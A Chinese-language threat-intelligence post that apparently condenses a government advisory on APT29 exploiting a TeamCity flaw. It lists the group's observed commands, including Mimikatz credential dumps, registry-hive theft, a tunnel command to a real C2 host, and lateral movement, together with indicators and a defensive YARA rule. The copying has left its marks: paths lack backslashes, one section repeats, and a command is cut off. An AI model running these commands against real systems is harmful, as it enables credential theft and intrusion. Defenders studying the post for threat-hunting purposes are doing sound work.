APT29 最新技战术分享

特点

近期APT29TTP手法更新如下：

• Kerberoasting

• Golden Tickets 定向伪造

• SQL server存储procedures 以保持持久性。

• 自带易受攻击的驱动程序 // Disabling EDR

• DLL hijacking

• CVE-2023-42793 RCE

Cozy Bear 简介

俄罗斯外国情报局 (SVR) 网络攻击者 — 也称为APT29、Dukes、CozyBear 和 NOBELIUM/Midnight Blizzard — 正在利用 CVE-2023-42793 自 2023 年 9 月起大规模对托管 JetBrains TeamCity 软件的服务器进行攻击。软件开发人员使用 TeamCity 软件来管理和自动化软件编译、构建、测试、发布。如果受到威胁，对 TeamCity 服务器的访问将提供恶意攻击者

Initial Access - Exploitation

APT29 于 9 月底开始利用连接互联网的 JetBrains TeamCity 服务器 [T1190 CVE-2023-42793，RCE。

Host Reconnaissance

whoami /priv
whoami /all
whoami /groups
whoami /domain
nltest -dclist
nltest -dsgetdc
tasklist
netstat
wmic /node:""<redacted>"" /user:""<redacted>"" /password:""<redacted>"" process list brief
wmic /node:""<redacted>"" process list brief
wmic process get commandline -all
wmic process <proc_id> get commandline
wmic process where name=""GoogleCrashHandler64.exe"" get commandline,processed
powershell ([adsisearcher]"((samaccountname=<redacted>))").Findall().Properties
powershell ([adsisearcher]"((samaccountname=<redacted>))").Findall().Properties.memberof
powershell Get-WmiObject -Class Win32_Service -Computername
powershell Get-WindowsDriver -Online -All

File Exfiltration

C:Windowssystem32ntoskrnl.exe 用于精确识别系统版本，可能是部署 EDRSandBlast 的先决条件。 SQL Server 可执行文件 - 根据对后渗透行为的审查，APT29 对受损系统上安装的 SQL Server 的特定文件表现出兴趣:

C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqlmin.dll,

C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqllos.dll,

C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqllang.dll,

C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqltses.dll

C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsecforwarder.dll

Visual Studio 文件 - 根据对后渗透行为的审查，APT29 对 Visual Studio 的特定文件表现出兴趣:

C:Program Files (x86)Microsoft Visual Studio2017SQLCommon7IDEVSIXAutoUpdate.exe

更新管理代理文件 - 根据对后渗透行为的审查，APT29 对补丁管理软件的可执行文件和配置表现出兴趣:

C:Program Files (x86)PatchManagementInstallationAgent12Httpdbinhttpd.exe

C:Program Files (x86)PatchManagementInstallationAgent12Httpd

C:ProgramDataGFILanGuard 12HttpdConfighttpd.conf

Interest in SQL Server

# 使用PowerShell进行文件压缩
Compress-Archive -Path "C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqlmin.dll","C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqllos.dll","C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqllang.dll","C:Program FilesMicrosoft SQL ServerMSSQL14.MSSQLSERVERMSSQLBinnsqltses.dll" -DestinationPath C:Windowstemp1sql.zip
# APT29网络攻击者还渗透了 secforwarder.dll 文件

Avoid Detection

为了避免被检测，APT29使用了“Bring Your Own Vulnerable Driver” [T1068] 技术，以禁用或直接终止端点检测和响应（EDR）以及防病毒（AV）软件 [T1562.001]。这是通过使用一个名为“EDRSandBlast”的开源项目完成的。编写机构观察到APT29使用EDRSandBlast去除了受保护的进程轻量级（PPL）保护，该保护用于控制和保护运行中的进程，使其免受感染。攻击者随后在一小部分受害者中向AV/EDR进程注入代码[T1068]。此外，执行可能被检测到的可执行文件（即Mimikatz）时，这些文件是在内存中执行的[T1003.001]。在几个案例中，APT29尝试通过以下方式隐藏他们的后门:

• 滥用Zabbix软件中的DLL劫持漏洞，通过将一个包含GraphicalProton后门的合法Zabbix DLL替换为他们自己的DLL来隐藏后门。

• 在Microsoft开发的名为vcperf的开源应用程序中植入后门。APT29修改并复制了公开可用的源代码。在执行后，带后门的vcperf将几个DLL文件写入磁盘，其中之一是GraphicalProton后门。

• 滥用Webroot防病毒软件中的DLL劫持漏洞，通过将一个包含GraphicalProton后门的合法DLL替换为他们自己的DLL来隐藏后门。

为了避免被网络监控检测，APT29设计了一个秘密的C2通道，使用Microsoft OneDrive和Dropbox云服务。为了进一步实现混淆，通过OneDrive和Dropbox与恶意软件交换的数据被隐藏在随机生成的BMP文件中[T1564].

Privilege Escalation

为了促进特权升级 [T1098]，APT29使用了多种技术，包括WinPEAS、NoLMHash注册表键修改和Mimikatz工具。

APT29使用以下reg命令修改NoLMHash注册表：

powershellCopy code
reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa /v NoLMHash /t REG_DWORD /d "0" /f

APT29使用以下Mimikatz命令 [T1003]:

plaintextCopy codeprivilege::debug
lsadump::cache
lsadump::secrets
lsadump::sam
sekurlsa::logonpasswords

持久性 APT29依赖于计划任务 [T1053.005] 来确保后门的持久执行。根据APT29所具有的权限，它们的可执行文件存储在以下其中一个目录中：

• C:Windowstemp

• C:WindowsSystem32

• C:WindowsWinStore

APT29使用schtasks.exe二进制文件进行所有修改。然后，它有多个schtasks.exe传递的参数变体，可以在附录B - 指标中找到。

为了确保对环境的长期访问，APT29使用Rubeus工具包来制作票证授予票证 (TGTs) [T1558.001]。

Persistence

APT29依赖于计划任务 [T1053.005] 来确保后门的持久执行。根据APT29所具有的权限，它们的可执行文件存储在以下其中一个目录中：

• C:Windowstemp

• C:WindowsSystem32

• C:WindowsWinStore

APT29使用schtasks.exe二进制文件进行所有修改。然后，它有多个schtasks.exe传递的参数变体，可以在附录B - 指标中找到。

为了确保对环境的长期访问，APT29使用Rubeus工具包来制作票证授予票证 (TGTs) [T1558.001]。

敏感数据泄露 [T1020] APT29从受害者那里泄露了以下Windows注册表hive [T1003]:

• HKLMSYSTEM

• HKLMSAM

• HKLMSECURITY

为了泄露Windows注册表，APT29将hives保存到文件中 [T1003.002]，将它们打包，然后使用后门功能泄露它们。它使用“reg save”保存SYSTEM、SAM和SECURITY注册表hive，并使用powershell在C:WindowsTemp目录中制作.zip档案。

powershellCopy codereg save HKLMSYSTEM "C:Windowstemp1sy.sa" /y
reg save HKLMSAM "C:Windowstemp1sam.sa" /y
reg save HKLMSECURITY "C:Windowstemp1se.sa" /y
powershell Compress-Archive -Path C:Windowstemp1 -DestinationPath C:Windowstemps.zip -Force & del C:Windowstemp1 /F /Q

在一些特定情况下，APT29使用SharpChromium工具获取敏感的浏览器数据，例如会话cookie、浏览历史或已保存的登录信息。

APT29还使用DSInternals开源工具与目录服务进行交互。DSInternals允许获取敏感的域信息。

Network Reconnaissance

在APT29建立了安全立足点并了解了受害者的TeamCity服务器后，它将重心转向网络侦查 [T1590.004]。APT29使用内置命令和其他工具进行网络侦查，例如端口扫描器和PowerSploit，并将它们加载到内存中 [T1046]。APT29执行了以下PowerSploit命令：

• Get-NetComputer

• Get-NetGroup

• Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount

• Get-NetDiDomain

• Get-AdUser

• Get-DomainUser -UserName

• Get-NetUser -PreauthNotRequire

• Get-NetComputer | select samaccountname

• Get-NetUser -SPN | select serviceprincipalname

渗透受害环境 在选择的环境中，APT29使用一个名为“rr.exe”的附加工具，这是一个修改过的开源反向Socks隧道工具（Rsockstun）来建立到C2基础设施的隧道 [T1572]。编写机构知道与“rr.exe”一起使用的以下基础设施：

• 65.20.97[.]203:443

• Poetpages[.]com:8443

APT29执行Rsockstun时，它可以在内存中执行，也可以在将其放置到磁盘后使用Windows Management Instrumentation Command Line (WMIC) [T1047]实用程序执行：

powershellCopy code
wmic process call create "C:Program FilesWindows Defender Advanced Threat ProtectionSense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"

横向移动 APT29使用WMIC促进了横向移动 [T1047],[T1210]。

powershellCopy code
wmic /node:""<redacted>"" /user:""<redacted>" /password:""<redacted>"" process call create ""rundll32 C:Windowssystem32AclNumsInvertHost.dll AclNumsInvertHost""

APT29还修改了DisableRestrictedAdmin键以启用远程连接 [T1210]。它使用以下reg命令修改注册表：

powershellCopy code
reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa /v DisableRestrictedAd

Adversary Toolset

在TeamCity操作中，APT29使用了多个定制和开源可用的工具和后门。在操作期间观察到了以下自定义工具：

• GraphicalProton： 这是一个简单的后门，使用OneDrive、Dropbox和随机生成的BMP图像 [T1027.001] 与APT29操作员交换数据。

• 在执行后，GraphicalProton收集环境信息，如活动的TCP/UDP连接 [T1049]、运行中的进程 [T1049] 以及用户、主机和域名 [T1590]。OneDrive被用作主要通信通道，而Dropbox则被视为备用通道 [T1567]。API密钥被硬编码到恶意软件中。与云服务通信时，GraphicalProton生成一个随机命名的目录，用于存储特定感染的BMP文件 - 包含命令和结果 [T1564.001]。每次启动GraphicalProton进程时，目录名称都会重新随机化。

• 用于交换数据的BMP文件生成方式如下：

1. 使用zlib压缩数据，

2. 使用自定义算法加密数据，

3. 在加密的数据中添加“*”字符串文字，

4. 创建一个带有随机矩形的随机BMP，

5. 最后，在较低像素位中编码加密的数据。

• 虽然GraphicalProton后门在我们追踪的几个月里基本上没有变化，为了避免检测，对手将该工具包装在各种不同层次的混淆、加密、编码器和分段器中。两个特定的GraphicalProton“包装”变体尤其值得注意 - 一种变体使用Zabbix中的DLL劫持 [T1574.002] 作为启动执行的手段（并可能提供长期、难以检测的访问），另一种变体将自身掩藏在vcperf [T1036] 中，这是Microsoft的开源C++构建分析工具。

• GraphicalProton HTTPS变体： 这是APT29最近引入的GraphicalProton后门的一个变体，放弃使用基于云的服务作为C2通道，而是依赖于HTTP请求。

• 为了合法化C2通道，APT29使用重新注册的已过期域名设置了一个带有虚假WordPress网站的域。GraphicalProton的HTTPS变体的执行分为两个文件 - 分段器和包含进一步代码的加密二进制文件。

YARA

rule APT29_GraphicalProton {
 strings:
 // C1 E9 1B shr ecx, 1Bh
 // 48 8B 44 24 08 mov rax, [rsp+30h+var_28]
 // 8B 50 04 mov edx, [rax+4]
 // C1 E2 05 shl edx, 5
 // 09 D1 or ecx, edx
 // 48 8B 44 24 08 mov rax, [rsp+30h+var_28]
 $op_string_crypt = { c1 e? (1b | 18 | 10 | 13 | 19 | 10) 48 [4] 8b [2] c1 e? (05 |
08 | 10 | 0d | 07) 09 ?? 48 }
 // 48 05 20 00 00 00 add rax, 20h ; ' '
 // 48 89 C1 mov rcx, rax
 // 48 8D 15 0A A6 0D 00 lea rdx, unk_14011E546
 // 41 B8 30 00 00 00 mov r8d, 30h ; '0'
 // E8 69 B5 FE FF call sub_14002F4B0
 // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
 // 48 05 40 00 00 00 add rax, 40h ; '@'
 // 48 89 C1 mov rcx, rax
 // 48 8D 15 1B A6 0D 00 lea rdx, unk_14011E577
 // 41 B8 70 01 00 00 mov r8d, 170h
 // E8 49 B5 FE FF call sub_14002F4B0
 // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
International Partnership
Page 22 of 27 | Product ID: AA23-347A
TLP:CLEAR
TLP:CLEAR
 // 48 05 60 00 00 00 add rax, 60h ; '`'
 // 48 89 C1 mov rcx, rax
 // 48 8D 15 6C A7 0D 00 lea rdx, unk_14011E6E8
 // 41 B8 2F 00 00 00 mov r8d, 2Fh ; '/'
 // E8 29 B5 FE FF call sub_14002F4B0
 // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
 // 48 05 80 00 00 00 add rax, 80h
 // 48 89 C1 mov rcx, rax
 // 48 8D 15 7C A7 0D 00 lea rdx, unk_14011E718
 // 41 B8 2F 00 00 00 mov r8d, 2Fh ; '/'
 // E8 09 B5 FE FF call sub_14002F4B0
 // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
 // 48 05 A0 00 00 00 add rax, 0A0h
 $op_decrypt_config = {
 48 05 20 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
 48 05 40 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
 48 05 60 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
 48 05 80 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
 48 05 A0 00 00 00
 }
 condition:
 all of them
}

参考链接

• NSA, CISA, FBI, Joint Cyber Security Advisory, Russian SVR Targets U.S. and Allied Networks • CISA, Remediating Networks Affected by the Solarwinds and Active Directory/M365 Compromise International Partnership • CISA, Alert (AA21-008A), Detecting Post-Compromise Threat Activity in Microsoft Cloud • CISA, Alert (AA20-352A), Advanced Persistent Threat Compromise of Government Agencies,Critical Infrastructure, and Private Sector Organizations • CISA, CISA Insights, What Every Leader Needs to Know About the Ongoing  • FBI, CISA, Joint Cybersecurity Advisory, Advanced Persistent Threat Actors  • CISA, Malicious Activity Targeting COVID-19 Research, Vaccine Development • NCSC, CSE, NSA, CISA, Advisory: APT 29 Targets COVID-19 Vaccine Development

原文始发于微信公众号（TIPFactory情报工厂）：APT29 最新技战术分享